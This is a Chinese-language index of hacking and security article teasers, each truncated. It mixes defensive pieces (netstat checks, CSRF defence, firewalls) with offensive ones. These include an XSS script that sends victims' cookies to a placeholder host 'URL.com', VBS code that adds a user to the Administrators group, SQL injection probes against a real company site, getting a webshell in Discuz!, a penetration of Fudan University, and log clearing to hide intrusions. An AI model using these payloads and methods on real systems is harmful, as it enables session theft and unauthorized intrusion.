推荐:在网络安全中起重大作用的 Windows 命令
来源:中国IT实验室些基本命令往往可以在保护网络安全上起到很大作用下面几条命令作用就非常突出 检测网络连接 如果你怀疑自己计算机上被别人安装了木马或者是中了病毒但是手里没有完善工具来检测是不是真有这样事情发生那可以使用Windows自带网络命令来看看谁在连接你计算机具体命令格式是:netstat -an 这个命令能看到所有和本地计算机建立连接IP它包含 4个部分——proto(连接方式)、lo... [阅读全文]
路由器dos攻击:路由技术 利用路由器防止 DoS 疯狂攻击
来源:网管员世界 作者:李岳巍拒绝服务(DoS)攻击是目前黑客广泛使用种攻击手段它通过独占网络资源、使其他主机不 能进行正常访问从而导致宕机或网络瘫痪 DoS攻击主要分为Smurf、SYN Flood和Fraggle 3种在Smurf攻击中攻击者使用ICMP数据包阻塞服务器和其他网络资源;SYN Flood攻击使用数量巨大TCP半连接来占用网络资源;Fraggle攻击和Smurf攻击原理类似使用... [阅读全文]
密码心理学 看看黑客如何来破解密码
黑客破解不可避免要破解密码本文不从破解技术入手而从黑客窍门技巧入手分析密码心理学本文完全不涉及到具体技术完全是心理学、信息学内容本来也懒得写这是个很大内容自己想到只是点而已我见解简直是井底蛙看到天空 不过几个月前心血来潮写了提纲也就对着提纲详细写下来没有再花太多心思研究见谅 密码心理学就是从用户心理入手分析对方心理从而更快破解出密码掌握好可以快速破解、缩短破解时间获得用户信息这里说破解都只是在... [阅读全文]
vbs加用户:用vbs加用户的绝妙思路方法
来源:安全中国★ wsnetwork=CreateObject("WSCRIPT.NETWORK") os="WinNT://"&wsnetwork.ComputerName Set ob=GetObject(os) ’得到adsi接口,绑定 Set oe=GetObject(os&"/Administrators,group") ’属性,admin组 Set od=ob.Create("use... [阅读全文]
qq中转站:发现了注入点后的注入中转站
by 寂寞刺猬 对于个网站WebSite如果你手动发现了注入点无论是GET、POST或是COOKIE类型注入点这些注入点并且不适用于些我们常见注入工具比如NBSI你会如何办?手动注入?呵呵那你就慢慢猜吧! 刺猬不才从黑客手册中LT篇PHP数据转发文章中得到启发写出了段ASP数据转发脚本鉴于GET、POST、COOKIE 3种方式于是用VB编了个小自动生成这 3种方式代码在此发出和各位共享 使用很... [阅读全文]
新云cms:新云CMS Online.asp页面过滤不严导致SQL注入漏洞
漏洞发布:yamato[BCT] 发布日期:2008-2-15更新日期:2008-2-21受影响系统:最新版本漏洞文件:/inc/online.asp代码分析如下:OnlineSQL = "INSERT INTO NC_Online(id,ChannelID,username,identitys,station,ip,browser,startTime,lastTime,userid,strRef... [阅读全文]
《加密解密 技术内幕》1.21 PE教程2: 检验PE文件的有效性
理论: 如何才能校验指定文件是否为有效PE文件呢? 这个问题很难回答完全取决于想要精准程度您可以检验PE文件格式里各个数据结构或者仅校验些关键数据结构大多数情况下没有必要校验文件里每个数据结构只要些关键数据结构有效我们就认为是有效PE文件了下面我们就来实现前面假设 我们要验证重要数据结构就是 PE header从编程角度看PE header 实际就是个 IMAGE_NT_HEADERS 结构定义如... [阅读全文]
pdf解密:《加密解密 技术内幕》1.1 PE文件格式一览
考虑到早期写PE教程1是自己所有教程中最糟糕篇此番决心彻底重写篇以飨读者PE 意思就是 Portable Executable(可移植执行体)它是 环境自身所带执行体文件格式它些特性继承自 Unix Coff (common object file format)文件格式"portable executable"(可移植执行体)意味着此文件格式是跨平台 : 即使Windows运行在非IntelCP... [阅读全文]
推荐:防止CSRF攻击
来源:玄猫窝介绍说明:译言链接:http://www.yeeyan.com/articles/view/hanguofeng/3994原文链接:http://www.playhack.net/view.php?id=31概览:1. Hello World2. 介绍3. 有关认证技术3.1 Cookies Hashing3.2 HTTP来路3.3 验证码4. 次性令牌5. 最后话1.Hello Wo... [阅读全文]
对复旦大学的一次漫长渗透
上篇文章: 和我起进行php渗透 下篇文章: 推荐:防止CSRF攻击... [阅读全文]
和我一起进行php渗透
来源:安全中国最近直比较关注PHP注射东西.学习好几天了.也应该实战下了.目标http://app.xxxx.com .个市场调查门户.找注射点嘛,还是要用我们可爱搜索引擎.为什么可爱呢?会就知道了.Go Go Go !!!!! 在google中搜索php?id= site:xxx.com.意思就是说搜索XXX网站WebSite中以php?id=URL.嘿.还真让我找到个. http://ap... [阅读全文]
cmwap和cmnet的区别:对CMWAP的测试
作者:demonalex来源:demonalex狂人日记1)测试ARP首先测试是BAN灵感在CMWAP下进行ARP测试但通过GPRS进CMWAP是PPP协议和ARP在区别协议栈因此ARP在GPRS连入CMWAP上是不起作用=imgtag src="http://www.crazycoder.cn/WebFiles/20099/65278ace-91b5-4675-91c1-c76f32847c0b... [阅读全文]
推荐:XSS攻击Cookie欺骗中隐藏JavaScript执行
来源:至尊宝成长的路 比如发现处可XSS地方:scriptalert(不管如何样弹出就好)/script 自己弄个偷cookie文件目是让其他浏览者去浏览我们设计好陷阱scriptdocument.location='http://URL.com/cookie.php?cookie='+escape(document.cookie) /script 如何弄其实也不用我多说了现在主要说是如何隐藏Ja... [阅读全文]
更改系统用户名:如何使电脑无法更改系统用户名
来源:华夏黑客联盟今天把自己原创技术送给大家......虽然没什么技术含量,不过也是原创哈,希望大家支持.废话不多说,其实我也是偶然经发现;般网站WebSite服务器为了安全禁用服务里面倒数第 2个 workstation 服务可以防止webshell列出用户和服务;=700) window.open('http://www.crazycoder.cn/WebFiles/20099/c2223e6... [阅读全文]
discuzwebshell:Discuz! 6 后台拿Shell的思路方法
文章作者:Ryat (lib3r3t)信息来源:邪恶 8进制信息安全团队(Team)(www.eviloctal.com)注:文章首发狼族(www.wolvez.org)后由原创作者有请提交到邪恶 8进制转载请注明原始作者和出处如果后台可以在线编辑模板话下面思路方法就可以拿SHELL了:)1.后台编辑customfaq(customfaq.lang.php文件)在?后面加上复制内容到剪贴板代码:e... [阅读全文]
指间的黑客:木马--黑客的利器
1、木马分类 木马技术发展至今已经经历了4代第代即是简单密码窃取发送等没有什么特别的处第 2代木马在技术上有了很大进步冰河可以说为是国内木马典型代表的第 3代木马在数据传递技术上又做了不小改进出现了ICMP等类型木马利用畸形报文传递数据增加了查杀难度第 4代木马在进程隐藏方面做了大改动采用了内核插入式嵌入方式利用远程插入线程技术嵌入DLL线程或者挂接PSAPI,实现木马隐藏甚至在Wind... [阅读全文]
破解互联星空交换机共享上网
来源:华夏黑客联盟 作者:jiangnolove单位里直是用互联星空上网.原来只有台电脑.后来增加了台.还买了个交换机.我去网上查.我日了``原来互联星空不支持共享上网在这里想BS下互联星空 他不能共享就算了 它还把给你账号改了所以我们破解互联星空首先找到自己账号------------------------------------------------------------------... [阅读全文]
黑客入侵:黑客如何利用文件漏洞进行网站WebSite入侵
来源:安全中国、看见漏洞公告 最近想学习下文件包含漏洞在无意中看见了有关文件包含漏洞公告大致意思是这样PhpwCMS 1.2.6系统下列文件存在文件包含漏洞:/inc_ext/spaw/dialogs/table.php /inc_ext/spaw/dialogs/a.php /inc_ext/spaw/dialogs/colorpicker.php /inc_ext/spaw/dialo... [阅读全文]
解燃眉的急 教你5种常用密码破解办法
来源:中国IT实验室在日常操作中我们经常要输入各种各样密码例如开机时要输入密码QQ时也要先输入密码假如你忘记了这些密码就有可能用不了机器、打不开文件、不能聊天... 也许还会造成很大损失!下面我们就介绍电脑操作中常用密码破解思路方法希望能解你燃眉的急! 、遗忘了SYSTEM密码 如果你遗忘了CMOS设置中SYSTEM密码就无法启动机器了 解决办法只能是:打开机箱把电池取下、正负极短接给 CM... [阅读全文]
snmp口令:SNMP口令的利用以及一些相关知识
来源:安全中国很多人开始明白对于WIN2K来说关闭了TCP139和445端口以后安全性会提高很多起码很多对系统信息刺探扫描也无法进行了 般来说确是这样但要做到真正完善安全还需要从每个细节去考虑是否会存在隐患 比如对于完全安装WIN2K或者说启动了 简单网络管理协议(SNMP)系统来说仍然将存在非常致命隐患完全将你系统暴露给所有人 、从SNMP说起 SNMPSimple Network Manag... [阅读全文]
sybase清除日志:如何隐藏你的入侵踪迹和日志清除
来源:安全中国----第章 理论篇 I. 概述 II. 思想认识(MENTAL) III. 基础知识 IV. 高级窍门技巧 V. 当你受到怀疑时... VI. 被捕 VII. 有用 VIII. 最后话 I. 概述 ---------------------------------------------------------------------- 译者注:本文是德国著名... [阅读全文]
推荐: 3大方便的开源Linux防火墙生成器技术
对所有Linux系统和网络管理员来说个最基本窍门技巧是知道如何从头开始编写个强健iptables防火墙并且知道如何修改它使其适应多种区别情况然而在现实世界中这看起来似乎少的又少对iptables学习并非是个简单过程不过笔者在这里向您推荐外网上如下资料这样使用起来你就得心应手了 笔者认为所有管理员都应彻底地理解Iptables不过另外个可选择思路方法是运用出色Linux防火墙生成工具 Firew... [阅读全文]
有关注册Flag在破解中的应用
众所周知目前很多共享软件Software现在都使用全局变量作为软件Software注册和否标志在汇编中体现为在某个内存地址中存入1或0往往1代表已注册0为共享状态计算机专业用语中,这个内存地址称的为FLAG,当运行时化值为0读取windoz注册表或*.ini文件中注册信息后若已注册那么flag值变为1否则继续保持为0其他部分可以访问这个flag,维持软件Software共享状态般情况下我们只是非常... [阅读全文]
安全注射:安全检测的注射MSSQL
今天没事做,对本地家钢铁企业网站WebSite做了次安检,嘿嘿.漏洞大把.当然 这是意料中事.最近搞大家都喜欢搞脚本.那我也就从他们网站WebSite看看了. show.aspx?id=1’ 嘿嘿 asp.net 照样暴 说什么有未闭合分号. show.aspx?id=1 and (select @@version)0;-- 果然,2003系统 show.aspx?id=1 and ’sa’... [阅读全文]
脱壳工具:Bjfnt v1.3的脱壳思路方法手记
来源:安全中国这几天好像都看见有人问bjfnt 1.2壳如何脱,所以写了这篇文章,最新是1.3版,所以我在这里只讲1.3脱壳,我想1.2应该比1.3简单吧.当然这里有高手无数,只是他们没有时间写点东西出来,我就只有代劳了. 真是花指令无数,我总经验就是直F8,直到看到某个循环过不去了,然后停下来分析,在后面还有个大循环,我在里面转了10分钟才转出来,汗...,再次提醒各位,在这里面千万不要用F1... [阅读全文]
推荐:主流Unix操作系统的安全检测和防范
来源:安全中国§.前言 这篇文章主要针对些对网络安全感兴趣、同时又还不如何熟悉Unix入侵和防范朋友们而写篇文章本文循序渐进地介绍了黑客攻击Unix主机主要思路方法和系统管理员如何针对这些思路方法进行有效防御等 §.Unix特点 Unix能流行起来绝对不是偶然这跟Unix本身特点的突出是分不开特点那就是:1、极强可移植性;2、启动异步进程能力;3、致文件、设备和进程间I/O;5、... [阅读全文]
跨站脚本漏洞:PHP和ASP脚本程序上传漏洞探究和防御
1:上传漏洞利用原理只是针对form格式上传asp和php脚本*** nc(netcat) 用于提交数据包 dos界面下运行: nc -vv www.***.com 801.txt -vv: 回显 80: www端口 1.txt: 就是你要发送数据包 (更多使用思路方法请查看本区帖子) wse(wsockexpert) 对本机端口... [阅读全文]
添加文件到iso中:在可执行文件中添加菜单项
任务: 添加允许‘打开’ 菜单项和变灰‘关闭’ 菜单项在退出菜单项的前 工具: hex editor (例如 Hiew), 大脑(如你平常般使用) Ok, 开始工作 使用你熟悉和惯用十 6进制编辑工具(如Hiew)打开Hello.exe 直接到资源区(.rsrc). 如果使用hiew 则按F8, 再按F6进入.rsrc(译注:使用EXESCOPE 参见.rsrc中poer to RAW da... [阅读全文]
防火墙防护和渗透技术总体介绍
() 防火墙介绍 防火墙是种功能它使得内部网络和外部网络或Internet互相隔离以此来保护内部网络或主机简单防火墙可以由Router,3 Layer SwitchACL(access control list)来充当也可以用台主机甚至是个子网来实现复杂可以购买专门硬件防火墙或软件Software防火墙来实现 防火墙功能有: 1、过滤掉不安全服务和非法用户 ... [阅读全文]
